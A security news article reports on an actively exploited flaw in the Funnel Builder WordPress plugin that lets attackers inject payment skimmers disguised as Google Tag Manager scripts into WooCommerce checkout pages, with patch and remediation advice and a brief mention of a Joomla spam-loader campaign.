![\"\"](\"https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYS8AhChFEeH6IwT4x1eB5VAeGfriF4VVcwINAxXVIGyap3g0CKx0R2BdI4s99cE3Q5JHr-KUVHqdhAFNfQIrCTJ6p-vq7u5naMTwb-WFjgis4vBdR29M94wAT-Dqh46zsbo4heSJOVdFRxXzR3SgHt2ZoTPPBEbB3cu4azACiFFl7jcIGNxw1d_U7eVU9/s1600/funnel.png\")
A significant security vulnerability affecting the
Funnel Builder
plugin for WordPress is currently being exploited to inject malicious JavaScript code into WooCommerce checkout pages, leading to the theft of payment data.
The details of this exploit were recently
revealed
by Sansec. The vulnerability impacts all versions of the plugin prior to 3.15.0.3 and is present in over 40,000 WooCommerce stores.
The flaw allows unauthorized attackers to inject arbitrary JavaScript into every checkout page on the store, according to the Dutch e-commerce security company. FunnelKit, the developer of Funnel Builder, has released a patch for the vulnerability in version 3.15.0.3.
Attackers are embedding fake Google Tag Manager scripts into the plugin’s ‘External Scripts’ setting, disguising the injected code as regular analytics code. However, this code actually loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses during checkout.
According to Sansec, Funnel Builder has a publicly exposed checkout endpoint that permits incoming requests to select the internal method to run. Older versions did not verify the caller’s permissions or restrict the allowed methods to be invoked, making it vulnerable to exploitation.
By sending an unauthenticated request, a malicious actor could exploit this vulnerability to write attacker-controlled data into the plugin’s global settings, which then gets injected into every Funnel Builder checkout page.
The end goal of this attack is to extract sensitive information such as credit card details, CVVs, and billing addresses from unsuspecting visitors during checkout. Website owners are urged to update the Funnel Builder plugin to the latest version and review the ‘Settings > Checkout > External Scripts’ section for any unfamiliar scripts.
Sansec highlighted the tactic of disguising skimmers as Google Analytics or Tag Manager code as a common approach used by attackers, as it often goes unnoticed by reviewers.
This disclosure comes in the wake of Sucuri’s report on a campaign targeting Joomla websites with obfuscated PHP code to serve spammy content without the site owner’s knowledge, aiming to manipulate the site’s reputation for injecting spam.
Security researcher Puja Srivastava explained that the malicious script functions as a remote loader, contacting an external server to receive instructions on what content to serve on the infected website.
This dynamic approach enables attackers to alter the behavior of compromised websites without modifying local files repeatedly, facilitating activities such as injecting spam product links, redirecting visitors, or displaying malicious pages.
